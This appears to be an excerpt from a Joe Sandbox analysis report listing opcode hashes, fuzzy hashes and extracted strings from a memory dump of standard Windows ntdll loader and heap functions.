                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ca0f0f13f6c141861a092ab7218681e4ee8ce47330fcafc1c8ba36242c1bb4b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC71D1B1E00205AFCB24DF68CD81AAEB7F4FB44714F244529E8429B251DB39AE45EB51
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                      • API String ID: 0-1334570610
                                                                                                                                                                                                                      • Opcode ID: 33eb201e655602755f09ff1f5eb04d7527faad4a160ace0ec88078829aa24868
                                                                                                                                                                                                                      • Instruction ID: 7ea77bb0531c219f5404f834223e058391dc7897640b8d88b9a01147d8a52d04
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 33eb201e655602755f09ff1f5eb04d7527faad4a160ace0ec88078829aa24868
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB610571A00701EFDB28CF24C481B6ABBE2FF85715F148559E985CF282DB74E885EB91
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Failed to reallocate the system dirs string !, xrefs: 00FB82D7
                                                                                                                                                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 00FB82DE
                                                                                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 00FB82E8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                      • API String ID: 0-1783798831
                                                                                                                                                                                                                      • Opcode ID: 4c873b3b8e682f4d50f1c8247586a3340da43293dc2cf150c4bd937b9fe6b315
                                                                                                                                                                                                                      • Instruction ID: 08654d7418c462067a379ec21c51dcfaaa4e462c047ccab07662f73d0620c823
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c873b3b8e682f4d50f1c8247586a3340da43293dc2cf150c4bd937b9fe6b315
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB410571544300ABC734EB24DC42B5B77ECAF49760F04492EF988D7291EB79D801EB92
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • @, xrefs: 00FFC1F1
                                                                                                                                                                                                                      • PreferredUILanguages, xrefs: 00FFC212
                                                                                                                                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 00FFC1C5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                                                                                      • API String ID: 0-2968386058
                                                                                                                                                                                                                      • Opcode ID: c96ffec081b8329b1364381722294e5bd54c0ca6bb53301fb3f7551c708c7644
                                                                                                                                                                                                                      • Instruction ID: b1be994d75cfe4ca58062476d315d55f5f3af7d815ccca3f3d9f63d3d131865e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c96ffec081b8329b1364381722294e5bd54c0ca6bb53301fb3f7551c708c7644
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17416D72E0022DABDB11DAD4CD91BEEB7B8EF54710F14406AEA05B72A0D7749E44AB90
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                                                                                      • API String ID: 0-1373925480
                                                                                                                                                                                                                      • Opcode ID: 695b3326841947a0f70dc239aec6c329fd2bc6e51842ecf5e70680783b5a1430
                                                                                                                                                                                                                      • Instruction ID: df40438abec0425b524ace0e10cde953ade63d2a33d9ca3d34b66fa352b2e641
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 695b3326841947a0f70dc239aec6c329fd2bc6e51842ecf5e70680783b5a1430
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22411532D043588BEB22DBE5CC45BADB7B6FF45350F28045AE901EB782D738A945EB10
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 00FC4899
                                                                                                                                                                                                                      • LdrpCheckRedirection, xrefs: 00FC488F
                                                                                                                                                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 00FC4888
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                      • API String ID: 0-3154609507
                                                                                                                                                                                                                      • Opcode ID: d880ec8cc2ec5ec53490cd0ddc812a93057b87cad737fb8490dc50354f71f319
                                                                                                                                                                                                                      • Instruction ID: cbef9851d8f1d76b444bda1d4ee9bb888a2885f860e00eea7b1b05183f1061f7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d880ec8cc2ec5ec53490cd0ddc812a93057b87cad737fb8490dc50354f71f319
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3241B032A042529FCB21CE58DA62F667BE8BF89760F05065DEC98D7291D731FC00EB91
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                      • API String ID: 0-2558761708
                                                                                                                                                                                                                      • Opcode ID: e22f5ac160cb67bee1c8eee990540a54b59397d9eaafe6c78b07a7dc88853f6b
                                                                                                                                                                                                                      • Instruction ID: 0f40753e2255b726c6c8edbb427fadd550775f6a41329c2a7690888b957ddffb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e22f5ac160cb67bee1c8eee990540a54b59397d9eaafe6c78b07a7dc88853f6b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C11E472315941EFD728C614C8A2B79B3A4EF85B26F258119ED06CF251DB34EC84F751
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • LdrpInitializationFailure, xrefs: 00FC20FA
                                                                                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 00FC2104
                                                                                                                                                                                                                      • Process initialization failed with status 0x%08lx, xrefs: 00FC20F3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                      • API String ID: 0-2986994758
• Opcode ID: 93e0d38ad085ddc40d28bda6318c067f0b809617411e05e11babb2021402e09b
• Instruction ID: 2a7923284240c63850e5eb5668e228fd38eaefff4841f2b7f0dcb9b1b5d3addb
• Opcode Fuzzy Hash: 93e0d38ad085ddc40d28bda6318c067f0b809617411e05e11babb2021402e09b
• Instruction Fuzzy Hash: FDF0C231A40319BBD724EA48DD57FD9376CFB41B54F540069F6407B282D6B8E940EA92

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: #%u
• API String ID: 48624451-232158463
• Opcode ID: 46a44940a2e75414523fa8f7ac7ac679e728cbf544dfb910d60141302d8e54fc
• Instruction ID: 011816e10652248c50b3c1f233102a6fa875551fbc7db04e0983615c366eb588
• Opcode Fuzzy Hash: 46a44940a2e75414523fa8f7ac7ac679e728cbf544dfb910d60141302d8e54fc
• Instruction Fuzzy Hash: 78715DB1A0014A9FCB01DF98C981FAEB7F8EF48754F144065EA05E7251EA78EE05DB60

Strings
• LdrResSearchResource Exit, xrefs: 00F4AA25
• LdrResSearchResource Enter, xrefs: 00F4AA13
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
• API String ID: 0-4066393604
• Opcode ID: 2015be9bab5c548c935f71a2c90cc0ab18c74824d3f415c99c660ff822de9b02
• Instruction ID: 1e71dfa7646d3feb79f7a8b6ec773aeaf3c794a0d92a344c4c27deb59bd6636a
• Opcode Fuzzy Hash: 2015be9bab5c548c935f71a2c90cc0ab18c74824d3f415c99c660ff822de9b02
• Instruction Fuzzy Hash: 34E170B2E40218DFEB219E98C980BAEBBB9EF55364F14402AFD01E7251D778DD40EB51

Strings
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID: `$`
• API String ID: 0-197956300
• Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
• Instruction ID: 7ea7008e5ac5e0e598f74a957c0525356a797b2f31d26a8f15954dc7300b1b77
• Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
• Instruction Fuzzy Hash: 0AC18C313043429BE726CE28C841B6ABBE5BFC4314F188A2DF6D68B2D1D775D545CB51

Strings
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID: InitializeThunk
• String ID: Legacy$UEFI
• API String ID: 2994545307-634100481
• Opcode ID: bec924169a6b099303121cb926b55e7359c0252754ee447c83c91a50d9ac91af
• Instruction ID: bd49bfa2cb1141b53843d57a3a748180241291fb1684fffaae904888ff8ce0cc
• Opcode Fuzzy Hash: bec924169a6b099303121cb926b55e7359c0252754ee447c83c91a50d9ac91af
• Instruction Fuzzy Hash: 3F614A72E006189FDB14DFA9C841BEEBBB5FB48700F204169E559EB291DA31E900EF50

Strings
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID: @$MUI
• API String ID: 0-17815947
• Opcode ID: 44b8cbe167561dd9029e74ef923cc8b48a319370207161dfa8fc9f4957c96a3f
• Instruction ID: 2e21c936143f76335e4441df83172551d024f7b79b5ad50ae672f14b054e299b
• Opcode Fuzzy Hash: 44b8cbe167561dd9029e74ef923cc8b48a319370207161dfa8fc9f4957c96a3f
• Instruction Fuzzy Hash: 795145B1E0025DAFDB11DFA5CC81AEEBBB8EB48754F140529E900B7281D634AE05DBA0

Strings
• TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 00F4063D
• kLsE, xrefs: 00F40540
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
• API String ID: 0-2547482624
• Opcode ID: d3f1c038cd6b8fdc961ee17751e9ef67a235d1656fa977958d8b0c7279398b9c
• Instruction ID: d27c42d1eb6b541f8210f9e3856a185e7b0648f7cc5e1eeb4cfae57d0528103d
• Opcode Fuzzy Hash: d3f1c038cd6b8fdc961ee17751e9ef67a235d1656fa977958d8b0c7279398b9c
• Instruction Fuzzy Hash: 9C51BE729047469FC724EF64C4406A7BBE8EF84714F04883EEADA87241EB74E945DF92

Strings
• RtlpResUltimateFallbackInfo Exit, xrefs: 00F4A309
• RtlpResUltimateFallbackInfo Enter, xrefs: 00F4A2FB
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
• API String ID: 0-2876891731
• Opcode ID: 07e20e65593d30f2350731989c40f077464fa941f5a54d3bbd8788cff39a83e2
• Instruction ID: a4999bfb603fd472fd582585132ff859a0e38a367f0ddd4086955fb5e5142e8d
• Opcode Fuzzy Hash: 07e20e65593d30f2350731989c40f077464fa941f5a54d3bbd8788cff39a83e2
• Instruction Fuzzy Hash: 5B419C71A44649DBDB21CF69C840B6ABBB4EF85750F2440A9EC01DB291E376DA40EB51

Strings
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID: InitializeThunk
• String ID: Cleanup Group$Threadpool!
• API String ID: 2994545307-4008356553
• Opcode ID: be89eeebeb9b61bc315b3a642e5e385f36eec5c7d8dba156cff1c0d52a8bf522
• Instruction ID: 4899c2fb53e50cd2b35b395c2770369e427a864c7df05c331f427daa1dd78e55
• Opcode Fuzzy Hash: be89eeebeb9b61bc315b3a642e5e385f36eec5c7d8dba156cff1c0d52a8bf522
• Instruction Fuzzy Hash: DE01ADB2240B00EFD311DF14CD46B1A77E8E784B15F05893AA54CC7190E739EA04EB47

Strings
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID: MUI
• API String ID: 0-1339004836
• Opcode ID: fe3c85b42959d6d252686498863bdf1c1836a65365989f30259e4bcb3b568c2d
• Instruction ID: fb439a69642d221f57d3b1dfc8540d7c9e1a712044e625d0272f57a18e910ffa
• Opcode Fuzzy Hash: fe3c85b42959d6d252686498863bdf1c1836a65365989f30259e4bcb3b568c2d
• Instruction Fuzzy Hash: 6A825C75E012188FDB64CFA9C880BADBBB1FF48720F14816AEC59AB351D7749D41EB90

Strings
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID: 0-3916222277
                                                                                                                                                                                                                      • Opcode ID: e50bb092bbaa4174643df7a19a2e6f7c03c32fb3d4031d137befefd0d994f1a3
                                                                                                                                                                                                                      • Instruction ID: 52c2391da54ee7d4fe697db24310f3d2a71edb8d794e96bedcdcaa07d735570b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e50bb092bbaa4174643df7a19a2e6f7c03c32fb3d4031d137befefd0d994f1a3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E19164B1940219AFDB21DF94CD86FAE77B8EF04B50F240069F601EB191D775AD04EB60
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 0-3916222277
                                                                                                                                                                                                                      • Opcode ID: 8f0533e730d8f552262d78f68b7078b14a9490094d4afec93d1aff6682eb7694
                                                                                                                                                                                                                      • Instruction ID: 323bede1d386ade068cc5ec33cec97c75d4bebc50242313b903f94542b2ecce3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f0533e730d8f552262d78f68b7078b14a9490094d4afec93d1aff6682eb7694
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2291D232D00589AFDB22AFA5EC45FAFBB79EF85750F100019F500A7251EB789905EB51
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: GlobalTags
                                                                                                                                                                                                                      • API String ID: 0-1106856819
                                                                                                                                                                                                                      • Opcode ID: 691a546c9e853acca228d9c867aa43cccd11dd47473ac1a0ea83347b2ab30aa8
                                                                                                                                                                                                                      • Instruction ID: 62d3978907dca023146ce99a6a211233be1e9ddca9a9c8d575a3a3bd80559be3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 691a546c9e853acca228d9c867aa43cccd11dd47473ac1a0ea83347b2ab30aa8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE716F75E0021A9FDF28DF9AC9916EDBBB1BF48714F24812AE405E7240DB399D41EF50
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: .mui
                                                                                                                                                                                                                      • API String ID: 0-1199573805
                                                                                                                                                                                                                      • Opcode ID: 01bbfda2974deda2a37be3674d731775d79f6ed14b774fa38e1f77f2a441d9de
                                                                                                                                                                                                                      • Instruction ID: bf0d86bf4e114450dc27d315b4bb997d6471f2b0c4e3658901076525d527f271
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 01bbfda2974deda2a37be3674d731775d79f6ed14b774fa38e1f77f2a441d9de
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12519372D002699BCF10DF9AD840AAEB7B5AF44B20F05412EE915BB341D73CAD05EFA4
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: EXT-
                                                                                                                                                                                                                      • API String ID: 0-1948896318
                                                                                                                                                                                                                      • Opcode ID: 6f427873c59db60fe2f6e1f0e1e9dd803227ec33060cd833be02e3371bada0ee
                                                                                                                                                                                                                      • Instruction ID: caf829e3309aaeee2f08e845681d7bc946e2026ab1cd9719fb5a1858bd4b68b5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f427873c59db60fe2f6e1f0e1e9dd803227ec33060cd833be02e3371bada0ee
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9941B0729083019BD714DA74D841B6BB7E8AF8CB15F04092DFE94E7180E678DA08E797
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: BinaryHash
                                                                                                                                                                                                                      • API String ID: 0-2202222882
                                                                                                                                                                                                                      • Opcode ID: 68f645879b6b4df87c8e126e3c2c157c6c44c1ab25fbaf41fa5755bbbe4a38f4
                                                                                                                                                                                                                      • Instruction ID: 8661e708b9de4ab68449a9e5c8bade42b760f2ec69533a6a0971b10039a5dae9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68f645879b6b4df87c8e126e3c2c157c6c44c1ab25fbaf41fa5755bbbe4a38f4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 744163B1D0012CABDB21DA61CC85FDFB77CAB44714F0045A5FA08AB141DB749E899FE4
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: #G/
                                                                                                                                                                                                                      • API String ID: 0-1619875725
                                                                                                                                                                                                                      • Opcode ID: bfa4229c55a8a5cfaf98ae2a9a3696cc69834c5327eb6436381f0210b0854ac3
                                                                                                                                                                                                                      • Instruction ID: fae92503fa372378e705435861451d38cd5604e58f797c6eaa6dbe57fb0c2c9c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bfa4229c55a8a5cfaf98ae2a9a3696cc69834c5327eb6436381f0210b0854ac3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44417F719043119BD720DF24C845F9BBBE8FF88764F008A2EF598D7291DB749905DB92
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: #
                                                                                                                                                                                                                      • API String ID: 0-1885708031
                                                                                                                                                                                                                      • Opcode ID: 513d06930ebb08bd375bfb02584e7075fe003beff4e81f7a4200a0cf9ca70f34
                                                                                                                                                                                                                      • Instruction ID: 4bd24e7c27e0000177465668f96046f74a3121452ca5e3caa4ff054335ed5a9e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 513d06930ebb08bd375bfb02584e7075fe003beff4e81f7a4200a0cf9ca70f34
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 24312631A107189BDB22DB68CC50BEE77A9DF44715F18402AE980EB382DB79EC05EB50
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: BinaryName
                                                                                                                                                                                                                      • API String ID: 0-215506332
                                                                                                                                                                                                                      • Opcode ID: 804e06751bf492ba21dc050f549d0160666074b389c75010f7fe30b8a95765fa
• Instruction ID: 4c3555687dbda2e83abb17bd3c813826515a70e329d44021e3702763f2d30ed7
• Opcode Fuzzy Hash: 804e06751bf492ba21dc050f549d0160666074b389c75010f7fe30b8a95765fa
• Instruction Fuzzy Hash: 3031F736D00519AFDB15DB5AC856EAFB7B4EFC0760F118129E905A7291D730AE04EFE0
Strings
• AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 00FC895E
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
• API String ID: 0-702105204
• Opcode ID: 34f2ec1471551afb40288e58b3a7784bcf853f2d5caf8fb240b3bf4f79952a20
• Instruction ID: dd0e600e755c8a78ae1748446a31d9abed6edc87697ec89aa70d3890a535ba19
• Opcode Fuzzy Hash: 34f2ec1471551afb40288e58b3a7784bcf853f2d5caf8fb240b3bf4f79952a20
• Instruction Fuzzy Hash: 04012B326002129BD7249B51DE87F7A7B69EFC2BE0F04042CF58116962CF75AC46F796
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e095adc571f87902360212e7932ce2fe74ccfc36d601c9cf16397139c48f1ce4
• Instruction ID: 56c293057b9678e5350bf08f4e57f23137fcc7c6011617839f7d2ecb7db2d9fd
• Opcode Fuzzy Hash: e095adc571f87902360212e7932ce2fe74ccfc36d601c9cf16397139c48f1ce4
• Instruction Fuzzy Hash: 7342F572A083818FD765CF66C891B6BB7E9BF84710F18092EF98287250E734DD45EB52
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3841fe7a7921ce9965df2ef6ec36f5f12ad9248410b24a55cdf4089ba396d200
• Instruction ID: c277ef9a9dc2c1bf387a998885d1bcf25d3aa0030754eebfa1f524b0204434f3
• Opcode Fuzzy Hash: 3841fe7a7921ce9965df2ef6ec36f5f12ad9248410b24a55cdf4089ba396d200
• Instruction Fuzzy Hash: C7424B75E002198FDB24CF69C841BADB7F6BF48350F18819AE949AB342DB349D86DF50
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: af3025cd610cc756380b26cf622ed5a7e8cf4dbf344c18105af0d1f0dbd5721c
• Instruction ID: 163844a79d9e8be7195abad47b20c5f9a35c14b6c8458bd63e9bc8ea984b1e7f
• Opcode Fuzzy Hash: af3025cd610cc756380b26cf622ed5a7e8cf4dbf344c18105af0d1f0dbd5721c
